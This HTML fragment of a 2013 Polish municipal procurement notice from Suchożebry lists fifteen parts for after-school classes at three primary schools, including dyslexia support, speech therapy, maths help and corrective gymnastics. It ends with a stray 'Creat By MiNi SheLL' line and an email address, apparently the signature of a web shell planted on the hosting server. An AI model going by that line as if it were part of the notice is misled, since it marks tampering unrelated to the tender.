<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2013 godzina 10:00, miejsce: Urząd Gminy Suchożebry ul.A. Ogińskiej 11, 08-125 Suchożebry, Sekretariat (pokój nr 16).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013r Priorytet. IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 3 grup dzieci, łącznie 90 godz. zajęć, z czego 33 godz. będą realizowane w 2013r., a 57 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 3 grup dzieci, łącznie 90 godz. zajęć, z czego 33 godz. będą realizowane w 2013r., a 57 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć logopedycznych dla dzieci ze Szkoły Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie, zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Prowadzenie zajęć psychoedukacyjnych w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Prowadzenie zajęć psychoedukacyjnych w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krynicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 1 grupy dzieci, łącznie 30 godz. zajęć, z czego 11 godz. będą realizowane w 2013r., a 19 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Krześlinie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Prowadzenie zajęć dla dzieci uzdolnionych w zakresie nauk matematyczno-przyrodniczych w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Prowadzenie zajęć gimnastyki korekcyjnej dla dzieci w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą prowadzone bezpośrednio po lekcjach lub przed lekcjami, cyklicznie zgodnie z harmonogramem zajęć uzgodnionym z dyrektorem szkoły(przewiduje się jedną godzinę zajęć dla każdej grupy w tygodniu). Zadanie obejmuje przeprowadzenie zajęć dla 2 grup dzieci, łącznie 60 godz. zajęć, z czego 22 godz. będą realizowane w 2013r., a 38 godz. w 2014r. Zajęcia będą prowadzone w Szkole Podstawowej w Suchożebrach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com